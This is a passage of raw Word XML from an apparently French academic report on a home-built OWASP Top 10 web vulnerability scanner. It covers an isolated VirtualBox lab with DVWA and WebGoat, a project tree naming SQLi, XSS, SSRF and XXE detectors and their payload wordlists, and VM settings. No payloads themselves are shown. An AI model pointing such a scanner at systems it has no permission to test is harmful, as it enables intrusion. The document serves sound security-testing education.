          <w:p w14:paraId="3386B901" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>22.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="52741DE6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OS des machines virtuelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C9B12B5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="0429768F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="1" w:color="003366"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.7  Environnement de Déploiement — Topologie Réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B60665" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour des tests réalistes et reproductibles, notre architecture de déploiement utilise deux machines virtuelles VirtualBox en réseau Host-Only. Ce type de réseau crée un segment réseau privé accessible uniquement depuis la machine hôte et entre les VM, garantissant l'isolation complète de l'environnement de test vis-à-vis d'Internet et du réseau local de production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73201E3D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Topologie complète de l'environnement de test virtualisé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32350A4A"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w:t>
        <w:br/>
        <w:t>│                    Machine Hôte — Windows 11 Pro                       │</w:t>
        <w:br/>
        <w:t>│                                                                        │</w:t>
        <w:br/>
        <w:t>│  ┌──────────────────────┐            ┌──────────────────────────────┐  │</w:t>
        <w:br/>
        <w:t>│  │  VM 1 — Scanner      │            │  VM 2 — Cible (Target)       │  │</w:t>
        <w:br/>
        <w:t>│  │─────────────────────│            │──────────────────────────────│  │</w:t>
        <w:br/>
        <w:t>│  │  Ubuntu 22.04 LTS    │   HTTP/S   │  Ubuntu 22.04 LTS            │  │</w:t>
        <w:br/>
        <w:t>│  │  Python 3.11         │◄──────────►│  Apache 2.4 + PHP 8.1        │  │</w:t>
        <w:br/>
        <w:t>│  │  imple/main.py       │ 192.168.56 │  MySQL 8.0                   │  │</w:t>
        <w:br/>
        <w:t>│  │  pytest              │   .0/24    │  DVWA (port 80)              │  │</w:t>
        <w:br/>
        <w:t>│  │─────────────────────│            │  WebGoat (port 8080)         │  │</w:t>
        <w:br/>
        <w:t>│  │  IP: 192.168.56.101  │            │  IP: 192.168.56.102          │  │</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>│  └──────────────────────┘            └──────────────────────────────┘  │</w:t>
        <w:br/>
        <w:t>│                                                                        │</w:t>
        <w:br/>
        <w:t>│  Réseau: VirtualBox Host-Only Adapter — segment 192.168.56.0/24        │</w:t>
        <w:br/>
        <w:t>│  Isolation: aucun accès Internet depuis les VMs (réseau fermé)         │</w:t>
        <w:br/>
        <w:t>└────────────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D883BD"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2.8  Structure du Projet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842AEBF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Arborescence complète du projet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01369B00"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imple/</w:t>
        <w:br/>
        <w:t>├── main.py                  # Point d'entrée CLI (argparse) + print_summary()</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── scanner/                 # Orchestrateur principal</w:t>
        <w:br/>
        <w:t>│   ├── __init__.py          # Export de Vulnerability + lazy import Scanner</w:t>
        <w:br/>
        <w:t>│   ├── core.py              # Classe Scanner + ScanOptions (dataclass)</w:t>
        <w:br/>
        <w:t>│   ├── vulnerability.py     # Dataclass Vulnerability (modèle de données)</w:t>
        <w:br/>
        <w:t>│   └── authenticator.py    # login_dvwa() + login_form_based()</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── crawler/</w:t>
        <w:br/>
        <w:t>│   ├── __init__.py</w:t>
        <w:br/>
        <w:t>│   └── crawler.py           # Classe Crawler BFS + Endpoint dataclass</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── detectors/</w:t>
        <w:br/>
        <w:t>│   ├── __init__.py          # ALL_DETECTORS dict + exports</w:t>
        <w:br/>
        <w:t>│   ├── base.py              # BaseDetector (Template Method) + PassiveDetector</w:t>
        <w:br/>
        <w:t>│   ├── sqli.py              # SQLiDetector  — A03 Injection</w:t>
        <w:br/>
        <w:t>│   ├── xss.py               # XSSDetector   — A03 Injection</w:t>
        <w:br/>
        <w:t>│   ├── ssrf.py              # SSRFDetector  — A10 SSRF</w:t>
        <w:br/>
        <w:t>│   ├── idor.py              # IDORDetector  — A01 Access Control</w:t>
        <w:br/>
        <w:t>│   ├── path_traversal.py    # PathTraversalDetector — A01</w:t>
        <w:br/>
        <w:t>│   ├── xxe.py               # XXEDetector   — A05 Misconfig</w:t>
        <w:br/>
        <w:t>│   ├── file_upload.py       # FileUploadDetector — A04 Insecure Design</w:t>
        <w:br/>
        <w:t>│   ├── auth.py              # AuthFailuresDetector — A07</w:t>
        <w:br/>
        <w:t>│   ├── crypto.py            # CryptographicFailuresDetector — A02 (passif)</w:t>
        <w:br/>
        <w:t>│   ├── security_misconfig.py# SecurityMisconfigDetector — A05 (passif)</w:t>
        <w:br/>
        <w:t>│   ├── components.py        # VulnerableComponentsDetector — A06 (passif)</w:t>
        <w:br/>
        <w:t>│   └── integrity.py         # IntegrityDetector — A08 (passif)</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── evaluator/</w:t>
        <w:br/>
        <w:t>│   ├── __init__.py</w:t>
        <w:br/>
        <w:t>│   └── cvss.py              # CVSSEvaluator + CVSS_PROFILES + get_severity()</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── reporter/</w:t>
        <w:br/>
        <w:t>│   ├── __init__.py</w:t>
        <w:br/>
        <w:t>│   └── html_reporter.py     # HTMLReporter.save() → rapport.html autonome</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── payloads/                # Wordlists de payloads</w:t>
        <w:br/>
        <w:t>│   ├── sqli.txt             # 50+ payloads SQLi (error/time/boolean/union)</w:t>
        <w:br/>
        <w:t>│   ├── xss.txt              # 40+ payloads XSS avec bypass</w:t>
        <w:br/>
        <w:t>│   ├── ssrf.txt             # 30+ URLs internes et cloud metadata</w:t>
        <w:br/>
        <w:t>│   ├── path_traversal.txt   # 25+ séquences ../ encodées</w:t>
        <w:br/>
        <w:t>│   └── xxe.txt              # 15+ payloads XXE</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>└── tests/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── conftest.py          # Fixture Flask vulnérable (app in-memory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_detectors.py    # Tests détecteurs actifs</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_cvss.py         # Tests scoring CVSS</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_crawler.py      # Tests BFS et extraction</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_reporter.py     # Tests génération HTML</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_file_upload.py  # Tests détecteur upload</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── test_passive_detectors.py  # Tests détecteurs passifs</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── run_vuln_app.py      # Lance l'app Flask sur :5001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4F8A9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="392444F0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="1" w:color="B40000"/>
        </w:pBdr>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapitre 3 – Réalisation et Implémentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F756C7D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ce chapitre présente la réalisation concrète de notre scanner. Après avoir décrit l'environnement de test virtualisé et les étapes d'installation, nous détaillons l'implémentation de chaque module avec des extraits de code commentés, la suite de tests unitaires, puis huit études de cas illustrant la détection effective des vulnérabilités sur notre application Flask de test. Nous concluons par une analyse complète des 70 vulnérabilités détectées et des performances du scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFC989"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3.1  Environnement de Travail (Machines Virtuelles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C73433E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.1.1  Configuration VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE77D63" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>VirtualBox 7.0 a été utilisé comme hyperviseur de type 2 sur la machine hôte (Windows 11 Pro). Deux machines virtuelles ont été créées avec les paramètres suivants, puis connectées via un réseau Host-Only (vboxnet0) avec le segment 192.168.56.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C20CF7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Configuration détaillée des machines virtuelles</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3112"/>
        <w:gridCol w:w="3113"/>
        <w:gridCol w:w="3113"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="07436487" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A783CF0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Paramètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71C6C1E3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VM 1 — Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="710927A9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VM 2 — Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="2EA5C467" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F743256" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Système d'exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67BBD5EC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu 22.04 LTS (64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0A9FEB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu 22.04 LTS (64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="2946C5ED" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="286C6894" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RAM allouée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="61F4C257" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 048 Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="05D075E0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 048 Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="6B97630B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B23EDBE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Processeurs virtuels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C6440EE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 vCPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1BB910" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 vCPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4FEA7237" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="29BF7ABC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="31D43AC4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>20 Go (VDI dynamique)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="35DF3B15" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>25 Go (VDI dynamique)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4797B710" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="702C7CCC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Réseau adaptateur 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75BC8F9F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NAT (accès Internet initial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDECE28" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NAT (accès Internet initial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7E937A0E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2256B52F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Réseau adaptateur 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="737193C7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Host-Only vboxnet0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="673F32F9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Host-Only vboxnet0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="763E6A71" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABE7819" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Adresse IP Host-Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78125196" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D0E718" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.102</w:t>
